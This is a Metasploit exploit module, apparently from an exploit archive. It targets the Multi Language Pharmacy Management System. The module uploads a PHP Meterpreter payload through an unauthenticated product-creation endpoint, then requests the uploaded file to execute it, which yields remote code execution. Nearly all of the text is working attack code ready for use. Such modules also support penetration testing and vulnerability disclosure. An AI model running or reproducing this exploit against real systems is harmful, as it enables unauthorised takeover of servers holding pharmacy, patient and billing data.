This Metasploit module exploits the file upload vulnerability of Multi Language Pharmacy Management System to achieve remote code execution.
742456930e5e52c2ee76502248a99373d271bc23c86a2afc2380664719fcc4cb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
# Vendor: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download
# Source: https://www.sourcecodester.com/php/15281/multi-language-pharmacy-management-system-project-source-code.html
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Multi Language Pharmacy Management System Unauthenticated Remote Code Execution",
'Description' => %q{
This module exploits the file upload vulnerability of Multi Language Pharmacy Management System and allows remote code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Emirhan Kurt <[email protected]>' # author & msf module
],
'References' =>
[
['URL', 'https://prodaft.com']
],
'DefaultOptions' =>
{
'SSL' => false,
'WfsDelay' => 5,
},
'Platform' => ['php'],
'Arch' => [ ARCH_PHP],
'Targets' =>
[
['PHP payload',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
]
],
'Privileged' => false,
'DisclosureDate' => "Dec 19 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The TARGET URI of the Pharmacy Management', '/'])
]
)
end
def exploit
print_status('Uploading shell...')
fname = rand_text_alphanumeric(rand(10) + 6) + '.php'
boundary = "---------------------------#{rand_text_numeric(29)}"
data_post = "--#{boundary}\r\n"
data_post << "Content-Disposition: form-data; name=\"currnt_date\""
data_post << "\r\n\r\n"
data_post << "\r\n"
data_post << "--#{boundary}\r\n"
data_post << "Content-Disposition: form-data; name=\"Medicine\"; filename=\"#{fname}\"\r\n"
data_post << "Content-Type: application/x-php\r\n"
data_post << "\r\n#{payload.encoded}\r\n"
data_post << "--#{boundary}\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'php_action/createProduct.php'),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => data_post,
})
if res && res.code == 302 && res.body.include?('Image uploaded successfully')
print_good("Shell uploaded as #{fname}")
else
print_error("Server responded with code #{res.code}")
print_error("Failed to upload shell")
return false
end
print_status('Executing payload...')
send_request_cgi({
'uri' => normalize_uri(target_uri.path,'assets/myimages/'+fname),
'method' => 'GET'
}, 5)
if res
print_good("Payload successfully triggered !")
else
print_error("Server responded with code #{res.code}")
print_error("Failed to upload shell")
return false
end
handler
end
end